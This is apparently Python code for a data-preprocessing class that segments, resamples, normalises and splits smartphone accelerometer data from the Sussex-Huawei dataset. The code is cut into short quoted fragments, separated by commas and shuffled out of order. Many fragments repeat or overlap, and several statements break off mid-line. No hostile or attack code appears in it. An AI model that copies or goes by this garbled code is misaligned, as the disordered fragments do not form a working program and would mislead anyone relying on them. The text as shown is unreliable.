reduced_column_name is None: raise", ":param unit: :return: \"\"\" # Source: # https://stackoverflow.com/questions/19231871/convert-unix-time-to-readable-date-in-pandas-dataframe # https://stackoverflow.com/questions/42698421/pandas-to-datetime-from-milliseconds-produces-incorrect-datetime try: if data", "os import pandas from sklearn.decomposition import PCA import numpy class SussexHuaweiPreprocessor(Preprocessor): def __init__(self):", "not isinstance(data, pandas.DataFrame) or not isinstance(unwanted_labels, list) or not isinstance(replacement_mode, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value)", "__init__(self): super().__init__() @overrides def segment_data(self, data, mode, label_column=None, args=None): \"\"\" Segements a time", "segments_aggregated = [] split = lambda df, chunk_size : numpy.array_split(df, len(df) // chunk_size", "is not None: data[columns]=(data[columns]-data[columns].min())/(data[columns].max()-data[columns].min()) # to center around 0.0 substract 0.5 else: data", "data is None or target_columns is None or mode is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value)", "data = self.remove_outliers_from_quantitative_data( data, replacement_mode='quantile', columns=selected_columns, quantile=0.99 # current run @0.95 for classical", "self.segment_data(car_segment, mode='labels', label_column='road_label', args=selected_road_labels ) for road_segment in road_segments: data_test_segments.append(road_segment) #Segment Valid car_valid_segments", "https://thispointer.com/pandas-apply-apply-a-function-to-each-row-column-in-dataframe/ # https://www.google.com/search?client=ubuntu&channel=fs&q=euclidean+norm&ie=utf-8&oe=utf-8 # https://stackoverflow.com/questions/54260920/combine-merge-dataframes-with-different-indexes-and-different-column-names # https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.append.html reduced = data[columns].apply(numpy.square, axis=1)[columns].sum(axis=1).apply(numpy.sqrt) #**(1/2) alternative", "== 'threshold': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except", "if (len(labels) != len(data)): raise TypeError(self.messages.PROVIDED_FRAME_DOESNT_MATCH_DATA.value) return pandas.concat((labels, data), axis=1) except (TypeError, NotImplementedError,", ":param mean: :param std: :return: \"\"\" try: if data is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value)", "for segment in segments: if segment.shape[0] == segment_length: min_length_subsegements.append(segment) if not aggregate: for", "mode=config['feature_eng_dim_reduction_type'], # works better than euclidean for motif columns=acelerometer_columns, reduced_column_name='acceleration_abs' ) print('Normalizing, outlier", "threshold: :return: \"\"\" try: if data is None or replacement_mode is None or", "self.remove_outliers_from_quantitative_data( data, replacement_mode='quantile', columns=selected_columns, quantile=0.99 # current run @0.95 for classical approach via", "isinstance(mode, str) or not isinstance( columns, list): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode == 'custom_function':", "splitting min_length_subsegements = [] for segment in segments: if segment.shape[0] == segment_length: min_length_subsegements.append(segment)", ") for road_segment in road_segments: data_test_segments.append(road_segment) #Segment Valid car_valid_segments = self.segment_data(data_valid, mode='labels', label_column='coarse_label',", "is None or freq is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or", "pandas.DataFrame \"\"\" print('Fetch params') acelerometer_columns = [config['data_set_column_names'][1:][0], config['data_set_column_names'][1:][1], config['data_set_column_names'][1:][2]] freq = config['pre_proc_resample_freq'] #", "except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def label_data(self,", "ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def encode_categorical_features(self, data, mode, columns,", "raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not isinstance(mode, str) or not isinstance(reduced_column_name,", "self.segment_data(data_valid, mode='labels', label_column='coarse_label', args=selected_coarse_labels) data_valid_segments = [] for car_segment in car_valid_segments: road_segments =", "TS Fresh )[:-1] return data @overrides def training_split_process(self, data, config, labels): \"\"\" Apply", "reduced_column_name='acceleration_abs' ) #Test for ind in range(len(data_test_segments)): data_test_segments[ind] = self.reduce_quantitativ_data_dimensionality( data=data_test_segments[ind], mode=config['feature_eng_dim_reduction_type'], #", ":param data: :param target_columns: :param mode: :param args: :return: \"\"\" try: if data", "unit): \"\"\" Converts unix time stamps to date time. :param data: :param column:", "# works better than euclidean for motif columns=acelerometer_columns, reduced_column_name='acceleration_abs' ) #Valid for ind", "TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not isinstance(unwanted_labels, list) or not isinstance(replacement_mode, str):", ")[:-2] data_train = data_train.loc[:, ~data_train.columns.duplicated()] data_test = data_test.loc[:, ~data_test.columns.duplicated()] data_valid = data_valid.loc[:, ~data_valid.columns.duplicated()]", "std else: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) return data, mean, std except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc())", "replacement_mode: :param columns: :param quantile: :param threshold: :return: \"\"\" try: if data is", "= self.remove_outliers_from_quantitative_data( data_test, replacement_mode='quantile', columns=selected_columns[:-2], quantile=0.99 # current run @0.95 for classical approach", "or mode is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if", "# #https://stackoverflow.com/questions/2422750/in-opengl-vertex-shaders-what-is-w-and-why-do-i-divide-by-it for ind, column in enumerate(target_columns): data[column] = data[column] * (data[args[ind]] /", "for motif columns=acelerometer_columns, reduced_column_name='acceleration_abs' ) #Valid for ind in range(len(data_valid_segments)): data_valid_segments[ind] = self.reduce_quantitativ_data_dimensionality(", "= data[column] * (data[args[ind]] / data[args[3]]) return data raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError,", "raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if replacement_mode == 'mean': return MeanReplacementStrategy().replace(data, 'NaN') if replacement_mode == 'del_row':", "- mean) / std else: data = (data - mean) / std else:", "lines after comment: # https://stackoverflow.com/questions/56257329/how-to-split-a-dataframe-based-on-consecutive-index non_sequence = pandas.Series(selected_data.index).diff() != 1 grouper = non_sequence.cumsum().values", "data[column] = encoding_function(data[column]) return data raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1)", "except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def resample_quantitative_data(self,", ":param encoding_function: :return: \"\"\" try: if data is None or mode is None", "args=None): \"\"\" Segements a time series based on a label column, semantic segementation", "enumerate(target_columns): data[column] = data[column] * (data[args[ind]] / data[args[3]]) return data raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except", "data[column] = data[column][not_outliers] index_names = data[~not_outliers].index data.drop(index_names, inplace=True) old_index = data.index data =", "data, mode, columns, encoding_function): \"\"\" Encode categorical features using an encoding function. :param", "range(len(data_train_segments)): data_train_segments[ind] = self.reduce_quantitativ_data_dimensionality( data=data_train_segments[ind], mode=config['feature_eng_dim_reduction_type'], # works better than euclidean for motif", "group in selected_data.groupby(grouper)] for segment in selected_data_segments: data_segments.append(segment) return data_segments if mode ==", "nans') data = self.convert_unix_to_datetime(data, column='time', unit='ms') data = self.remove_nans(data, replacement_mode='del_row') data.set_index(data['time'], drop=True, inplace=True)", "all preprocessing steps necessary for training. :param data: pandas.DataFrame :param params: List :return:", "is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not isinstance(freq, str): raise", "# https://stackoverflow.com/questions/56257329/how-to-split-a-dataframe-based-on-consecutive-index non_sequence = pandas.Series(selected_data.index).diff() != 1 grouper = non_sequence.cumsum().values selected_data_segments = [group", "= data_valid.loc[:, ~data_valid.columns.duplicated()] #print('Rolling mean smoothing') #data_train['acceleration_abs'] = data_train['acceleration_abs'].rolling(5, min_periods=1, win_type='gaussian').sum(std=3) #TODO make", "config['pre_proc_validation_sz'] #acelerometer_columns = ['acceleration_x', 'acceleration_y', 'acceleration_z'] acelerometer_columns = [config['data_set_column_names'][1:][0], config['data_set_column_names'][1:][1], config['data_set_column_names'][1:][2]] selected_coarse_labels =", "replacement_vals=replacement_value) raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2)", "data[columns] = (data[columns] - data[columns].mean()) / data[columns].std() else: mean = data.mean() std =", "# works better than euclidean for motif columns=acelerometer_columns, reduced_column_name='acceleration_abs' ) print('Normalizing, outlier removal')", "'reduced', columns = None): \"\"\" Apply a dimensionality reduction technique to a data", "via TS Fresh )[:-1] return data @overrides def training_split_process(self, data, config, labels): \"\"\"", "columns is not None: data[columns] = (data[columns] - mean) / std else: data", "freq, mode = None): \"\"\" Resamples quantitative data. :param data: :param freq: :param", "pandas.DataFrame) or not isinstance(mode, str) or not isinstance( columns, list): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if", "data = self.convert_unix_to_datetime(data, column='time', unit='ms') data = self.remove_nans(data, replacement_mode='del_row') data.set_index(data['time'], drop=True, inplace=True) print('Resample')", "data_train, mean_train, std_train = self.znormalize_quantitative_data(data_train, selected_columns[:-2]) data_train = self.remove_outliers_from_quantitative_data( data_train, replacement_mode='quantile', columns=selected_columns[:-2], quantile=0.99", "reduced], axis=1) data = data.rename(columns={0: reduced_column_name}) data = data.reset_index(drop=True) data = data.set_index(old_index) return", "a time series based on a label column, semantic segementation of a fixed", "or mode is None or columns is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data,", "classical approach via TS Fresh )[:-1] return data @overrides def training_split_process(self, data, config,", "/ data[args[3]]) return data raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except", "old_index = data.index data = data.reset_index(drop=True) data = pandas.concat([data, reduced], axis=1) data =", "TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not isinstance(mode, str) or not isinstance(target_columns, list):", "substract 0.5 return data except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc())", "than euclidean for motif columns=acelerometer_columns, reduced_column_name='acceleration_abs' ) print('Normalizing, outlier removal') selected_columns = ['acceleration_abs']", "data.resample(freq).sum() except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def", ":return: pandas.DataFrame, pandas.DataFrame, pandas.DataFrame \"\"\" print('Fetch params') #print(params) labels = labels test_sz =", "= self.de_segment_data(data_train_segments, selected_columns) data_train, mean_train, std_train = self.znormalize_quantitative_data(data_train, selected_columns[:-2]) data_train = self.remove_outliers_from_quantitative_data( data_train,", "'default_val' :return: pandas.DataFrame \"\"\" try: if data is None or replacement_mode is None:", "7 lines of code after comment: # https://nextjournal.com/schmudde/how-to-remove-outliers-in-data for column in columns: not_outliers", "replacement_mode is None or columns is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame)", "try: data = None for ind in range(len(data_segments)): if data is None: data", "data = data.set_index(old_index) return data if replacement_mode == 'threshold': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value)", "return data except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides", "= data[~not_outliers].index data.drop(index_names, inplace=True) old_index = data.index data = data.reset_index(drop=False) data = data.set_index(old_index)", "vector and data matrix. :param labels: :param data: :return: \"\"\" try: if data", "data: pandas.DataFrame :param params: List :return: pandas.DataFrame, pandas.DataFrame, pandas.DataFrame \"\"\" print('Fetch params') acelerometer_columns", "overrides import overrides import traceback import os import pandas from sklearn.decomposition import PCA", "def de_segment_data(self, data_segments, selected_columns=None, axis = 0): \"\"\" Desegements as time series. :param", "self.logger.error(traceback.format_exc()) os._exit(2) @overrides def encode_categorical_features(self, data, mode, columns, encoding_function): \"\"\" Encode categorical features", "in road_segments: data_valid_segments.append(road_segment) print('Resample') #Train for ind in range(len(data_train_segments)): data_train_segments[ind] = data_train_segments[ind].set_index('time') data_train_segments[ind]", "Remove rows that have an unwanted label. :param data: :param unwanted_labels: :param replacement_mode:", "run @0.95 for classical approach via TS Fresh )[:-1] return data @overrides def", "'gyroscope': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) if mode == 'gravity': if len(target_columns) != len(args): raise TypeError(self.messages.PROVIDED_ARRAYS_DONT_MATCH_LENGTH.value)", "chunk_size : numpy.array_split(df, len(df) // chunk_size + 1, axis=0) # 1. Ensure index", ":return: \"\"\" try: data = None for ind in range(len(data_segments)): if data is", "a data set. :param data: :param columns: :return: \"\"\" try: if data is", "data[column] * (data[args[ind]] / data[args[3]]) return data raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError):", "data_segments if mode == 'fixed_interval': segment_length = args[0] aggregate = args[1] exact_length =", "data_train_segments[ind].set_index('time') data_train_segments[ind] = self.resample_quantitative_data(data_train_segments[ind], freq=freq) # 8000 1.25 Hz #Test for ind in", "replacement_mode == 'del_row': return DelRowReplacementStrategy().replace(data, 'NaN') if replacement_mode == 'replacement_val': return ReplacementValReplacementStrategy().replace(data, 'NaN',", "Hz #Test for ind in range(len(data_test_segments)): data_test_segments[ind] = data_test_segments[ind].set_index('time') data_test_segments[ind] = self.resample_quantitative_data(data_test_segments[ind], freq=freq)", "(TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def min_max_normalize_quantitative_data(self, data,", "print('Dimensionality reduction') data = self.reduce_quantitativ_data_dimensionality( data=data, mode=config['feature_eng_dim_reduction_type'], # works better than euclidean for", "import traceback import os import pandas from sklearn.decomposition import PCA import numpy class", "for classical approach via TS Fresh )[:-1] return data @overrides def training_split_process(self, data,", "= segments_combined.reset_index() segments_combined.index = pandas.DatetimeIndex( segments_combined.index.astype('datetime64[1s]')) segments_aggregated.append(segments_combined) return segments_aggregated except (TypeError, NotImplementedError, ValueError):", "threshold = None): \"\"\" Removes outlieres either based on quantile or a threshold", "run @0.95 for classical approach via TS Fresh )[:-2] #Test data_test = self.de_segment_data(data_test_segments,", "# https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.append.html # https://en.wikipedia.org/wiki/Principal_component_analysis pca = PCA(n_components=1) pca.fit(data[columns]) reduced = pandas.DataFrame((numpy.dot(pca.components_, data[columns].T).T)) reduced", "1: raise ValueError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value) if replacement_mode == 'quantile': # Source for next 7 lines", "~data_valid.columns.duplicated()] #print('Rolling mean smoothing') #data_train['acceleration_abs'] = data_train['acceleration_abs'].rolling(5, min_periods=1, win_type='gaussian').sum(std=3) #TODO make configureable #data_test['acceleration_abs']", "try: if data is None or column is None or unit is None:", "labels') #Segment Train car_train_segments = self.segment_data(data_train, mode='labels', label_column='coarse_label', args=selected_coarse_labels) data_train_segments = [] for", "= self.remove_nans(data, replacement_mode='del_row') print('Train, Test, Validation split') data_len = data.shape[0] test_len = int(data_len", ":param selected_columns: :param axis: :return: \"\"\" try: data = None for ind in", "segment = self.resample_quantitative_data(segment, freq=\"{}s\".format(segment_length), mode = 'mean') if segments_combined is None: segments_combined =", "or not isinstance(reduced_column_name, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode == 'euclidean': # Source: #", "columns: :param quantile: :param threshold: :return: \"\"\" try: if data is None or", "@overrides def min_max_normalize_quantitative_data(self, data, columns=None): \"\"\" Apply min-max-normalization to a data set. :param", "coordinate system. :param data: :param target_columns: :param mode: :param args: :return: \"\"\" try:", "= self.de_segment_data(data_valid_segments, selected_columns) data_valid, mean_valid, std_valid = self.znormalize_quantitative_data(data_valid, selected_columns[:-2], mean_train, std_train) data_valid =", "None): \"\"\" Resamples quantitative data. :param data: :param freq: :param mode: :return: \"\"\"", "of a fixed interval. :param data: :param mode: :param label_column: :param args: :return:", "system. :param data: :param target_columns: :param mode: :param args: :return: \"\"\" try: if", "selected_columns) data_valid, mean_valid, std_valid = self.znormalize_quantitative_data(data_valid, selected_columns[:-2], mean_train, std_train) data_valid = self.remove_outliers_from_quantitative_data( data_valid,", "std: :return: \"\"\" try: if data is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data,", "Validation split') data_len = data.shape[0] test_len = int(data_len * test_sz) train_len = int(data_len", "a global coordinate system. :param data: :param target_columns: :param mode: :param args: :return:", "segment in selected_data_segments: data_segments.append(segment) return data_segments if mode == 'fixed_interval': segment_length = args[0]", "meta_data): \"\"\" Apply all preprocessing steps necessary for inference. :param data: pandas.DataFrame :param", "for ind in range(len(data_train_segments)): data_train_segments[ind] = self.reduce_quantitativ_data_dimensionality( data=data_train_segments[ind], mode=config['feature_eng_dim_reduction_type'], # works better than", "data.std() data = (data - data.mean()) / data.std() elif mean is not None", "isinstance(data, pandas.DataFrame): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode == 'semantic': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) if mode ==", "z-normalization to a data set. :param data: :param columns: :param mean: :param std:", ":param columns: :return: \"\"\" try: if data is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not", "axis=0) if segments_combined is not None: segments_combined = segments_combined.reset_index() segments_combined.index = pandas.DatetimeIndex( segments_combined.index.astype('datetime64[1s]'))", "for car_segment in car_valid_segments: road_segments = self.segment_data(car_segment, mode='labels', label_column='road_label', args=selected_road_labels ) for road_segment", "1.25 Hz print('Dimensionality reduction') data = self.reduce_quantitativ_data_dimensionality( data=data, mode=config['feature_eng_dim_reduction_type'], # works better than", "from pipeline.feature_engineering.preprocessing.replacement_strategies.replacement_val_replacement_strategy import ReplacementValReplacementStrategy from overrides import overrides import traceback import os import", "ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def inference_split_process(self, data, config, meta_data):", "# https://www.google.com/search?client=ubuntu&channel=fs&q=euclidean+norm&ie=utf-8&oe=utf-8 # https://stackoverflow.com/questions/54260920/combine-merge-dataframes-with-different-indexes-and-different-column-names # https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.append.html reduced = data[columns].apply(numpy.square, axis=1)[columns].sum(axis=1).apply(numpy.sqrt) #**(1/2) alternative old_index", "win_type='gaussian').sum(std=3) #TODO make configureable #data_test['acceleration_abs'] = data_test['acceleration_abs'].rolling(5, min_periods=1, win_type='gaussian').sum(std=3) #data_valid['acceleration_abs'] = data_valid['acceleration_abs'].rolling(5, min_periods=1,", "mode='labels', label_column='road_label', args=selected_road_labels ) for road_segment in road_segments: data_valid_segments.append(road_segment) print('Resample') #Train for ind", "'mean' or mode is None: return data.resample(freq).mean() if mode == 'sum': return data.resample(freq).sum()", "valid_sz) data_train, data_test_valid = data.head(train_len), data.tail(test_len+valid_len) data_test = data_test_valid.head(test_len) data_valid = data_test_valid.tail(valid_len) print('Segment", "data = data.rename(columns={0: reduced_column_name}) data = data.reset_index(drop=True) data = data.set_index(old_index) return data if", "theory behind below calculation # https://en.wikipedia.org/wiki/Quaternions_and_spatial_rotation # https://en.wikipedia.org/wiki/Homogeneous_coordinates # #https://stackoverflow.com/questions/2422750/in-opengl-vertex-shaders-what-is-w-and-why-do-i-divide-by-it for ind, column", "encode_categorical_features(self, data, mode, columns, encoding_function): \"\"\" Encode categorical features using an encoding function.", "import os import pandas from sklearn.decomposition import PCA import numpy class SussexHuaweiPreprocessor(Preprocessor): def", "if data is None or replacement_mode is None or columns is None: raise", "segments_combined.reset_index() segments_combined.index = pandas.DatetimeIndex( segments_combined.index.astype('datetime64[1s]')) segments_aggregated.append(segments_combined) return segments_aggregated except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc())", "list): raise TypeError(type(data)) if mode == 'mean_estimate_gravity': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) if mode == 'gyroscope':", "raise TypeError(self.messages.PROVIDED_ARRAYS_DONT_MATCH_LENGTH.value) for ind, column in enumerate(target_columns): data[column] = data[column] - data[args[ind]] return", "a data set. :param current_representation: :param target_representation: :param data: :return: \"\"\" raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value)", "data_segments, selected_columns=None, axis = 0): \"\"\" Desegements as time series. :param data_segments: :param", "is None or replacement_mode is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame): raise", "data except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def", "in columns): raise TypeError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value) if columns is not None: data[columns]=(data[columns]-data[columns].min())/(data[columns].max()-data[columns].min()) # to center", "mode='labels', label_column='coarse_label', args=selected_coarse_labels) data_train_segments = [] for car_segment in car_train_segments: road_segments = self.segment_data(car_segment,", "if not isinstance(data, pandas.DataFrame): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode == 'semantic': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) if", "if mode == 'euclidean': # Source: # https://thispointer.com/pandas-apply-apply-a-function-to-each-row-column-in-dataframe/ # https://www.google.com/search?client=ubuntu&channel=fs&q=euclidean+norm&ie=utf-8&oe=utf-8 # https://stackoverflow.com/questions/54260920/combine-merge-dataframes-with-different-indexes-and-different-column-names #", "#https://stackoverflow.com/questions/2422750/in-opengl-vertex-shaders-what-is-w-and-why-do-i-divide-by-it for ind, column in enumerate(target_columns): data[column] = data[column] * (data[args[ind]] / data[args[3]])", "data = data.reset_index(drop=False) data = data.set_index(old_index) return data if replacement_mode == 'threshold': raise", "car_train_segments = self.segment_data(data_train, mode='labels', label_column='coarse_label', args=selected_coarse_labels) data_train_segments = [] for car_segment in car_train_segments:", "to a data set. :param data: :param columns: :return: \"\"\" try: if data", "== 'labels': # 1. Select all data with desired label value data_segments =", "segments_combined = segments_combined.reset_index() segments_combined.index = pandas.DatetimeIndex( segments_combined.index.astype('datetime64[1s]')) segments_aggregated.append(segments_combined) return segments_aggregated except (TypeError, NotImplementedError,", "os._exit(2) @overrides def project_accelerometer_to_global_coordinates(self, data, target_columns, mode, args=None): \"\"\" Project accelerometer data from", "reduced_column_name='acceleration_abs' ) #Valid for ind in range(len(data_valid_segments)): data_valid_segments[ind] = self.reduce_quantitativ_data_dimensionality( data=data_valid_segments[ind], mode=config['feature_eng_dim_reduction_type'], #", "range(len(data_valid_segments)): data_valid_segments[ind] = data_valid_segments[ind].set_index('time') data_valid_segments[ind] = self.resample_quantitative_data(data_valid_segments[ind], freq=freq) print('Dimensionality reduction') #Train for ind", "len(args): raise TypeError(self.messages.PROVIDED_ARRAYS_DONT_MATCH_LENGTH.value) for ind, column in enumerate(target_columns): data[column] = data[column] - data[args[ind]]", ":param labels: :param data: :return: \"\"\" try: if data is None or labels", "current run @0.95 for classical approach via TS Fresh )[:-1] return data @overrides", "os._exit(2) @overrides def inference_split_process(self, data, config, meta_data): \"\"\" Apply all preprocessing steps necessary", "for target_label in args: selected_data = data[data[label_column] == target_label] # 2. Split by", "remove_unwanted_labels(self, data, unwanted_labels, replacement_mode): \"\"\" Remove rows that have an unwanted label. :param", "for theory behind below calculation # https://en.wikipedia.org/wiki/Quaternions_and_spatial_rotation # https://en.wikipedia.org/wiki/Homogeneous_coordinates # #https://stackoverflow.com/questions/2422750/in-opengl-vertex-shaders-what-is-w-and-why-do-i-divide-by-it for ind,", "# Source: # https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.resample.html # https://jakevdp.github.io/PythonDataScienceHandbook/03.11-working-with-time-series.html try: if data is None or freq", "min_length_subsegements #3. Resample and aggregate data segments_combined = None for segment in min_length_subsegements:", "try: if data is None or replacement_mode is None or columns is None:", "(data - data.mean()) / data.std() elif mean is not None and std is", ":param freq: :param mode: :return: \"\"\" # Source: # https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.resample.html # https://jakevdp.github.io/PythonDataScienceHandbook/03.11-working-with-time-series.html try:", "@overrides def remove_outliers_from_quantitative_data(self, data, replacement_mode, columns, quantile = None, threshold = None): \"\"\"", "~data_train.columns.duplicated()] data_test = data_test.loc[:, ~data_test.columns.duplicated()] data_valid = data_valid.loc[:, ~data_valid.columns.duplicated()] #print('Rolling mean smoothing') #data_train['acceleration_abs']", "target_representation, data): \"\"\" Change representation of a data set. :param current_representation: :param target_representation:", "mean: :param std: :return: \"\"\" try: if data is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if", "@overrides def training_split_process(self, data, config, labels): \"\"\" Apply all preprocessing steps necessary for", "= self.remove_outliers_from_quantitative_data( data_train, replacement_mode='quantile', columns=selected_columns[:-2], quantile=0.99 # current run @0.95 for classical approach", "mean is None and std is None: if columns is not None: mean", "'threshold': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception:", "os._exit(2) @overrides def znormalize_quantitative_data(self, data, columns = None, mean = None, std =", "= pandas.concat([data, reduced], axis=1) data = data.rename(columns={0: reduced_column_name}) data = data.reset_index(drop=True) data =", "= int(data_len * test_sz) train_len = int(data_len * train_sz) valid_len = int(data_len *", "1. Select all data with desired label value data_segments = [] for target_label", "aggregate data segments_combined = None for segment in min_length_subsegements: segment = segment.reset_index() segment.index", "return min_length_subsegements #3. Resample and aggregate data segments_combined = None for segment in", "try: if data is None or labels is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not", "label data, remove nans') data = self.convert_unix_to_datetime(data, column = 'time', unit = 'ms')", "mean_train, std_train) data_valid = self.remove_outliers_from_quantitative_data( data_valid, replacement_mode='quantile', columns=selected_columns[:-2], quantile=0.99 # current run @0.95", "freq=freq) print('Dimensionality reduction') #Train for ind in range(len(data_train_segments)): data_train_segments[ind] = self.reduce_quantitativ_data_dimensionality( data=data_train_segments[ind], mode=config['feature_eng_dim_reduction_type'],", "segment_length) if not exact_length: for segment in segments: segment.index = pandas.DatetimeIndex(segment.index.astype('datetime64[1s]')) return segments", "segment_length: min_length_subsegements.append(segment) if not aggregate: for segment in min_length_subsegements: segment.index = pandas.DatetimeIndex(segment.index.astype('datetime64[1s]')) return", "mode == 'sum': return data.resample(freq).sum() except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception:", "for classical approach via TS Fresh )[:-2] data_train = data_train.loc[:, ~data_train.columns.duplicated()] data_test =", "#Train for ind in range(len(data_train_segments)): data_train_segments[ind] = self.reduce_quantitativ_data_dimensionality( data=data_train_segments[ind], mode=config['feature_eng_dim_reduction_type'], # works better", "None or mode is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value)", "data is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if not", "data[data[label_column] == target_label] # 2. Split by non-subsequent indices # Source for next", "data_test = self.de_segment_data(data_test_segments, selected_columns) data_test, mean_test, std_test = self.znormalize_quantitative_data(data_test, selected_columns[:-2], mean_train, std_train) data_test", "None or mode is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not", "not isinstance(mode, str) or not isinstance(reduced_column_name, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode == 'euclidean':", "params') #print(params) labels = labels test_sz = config['pre_proc_test_sz'] train_sz = config['pre_proc_training_sz'] valid_sz =", "if mean is None and std is None: if columns is not None:", "pipeline.feature_engineering.preprocessing.replacement_strategies.mean_replacement_strategy import MeanReplacementStrategy from pipeline.feature_engineering.preprocessing.replacement_strategies.del_row_replacement_strategy import DelRowReplacementStrategy from pipeline.feature_engineering.preprocessing.replacement_strategies.replacement_val_replacement_strategy import ReplacementValReplacementStrategy from overrides", ":param data: :param mode: :param columns: :param encoding_function: :return: \"\"\" try: if data", "segment_data(self, data, mode, label_column=None, args=None): \"\"\" Segements a time series based on a", "for ind in range(len(data_segments)): if data is None: data = data_segments[ind][selected_columns] else: data", "raise ValueError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value) if replacement_mode == 'quantile': # Source for next 7 lines of", "unwanted_labels: :param replacement_mode: :return: \"\"\" try: if data is None or replacement_mode is", "if not isinstance(data, 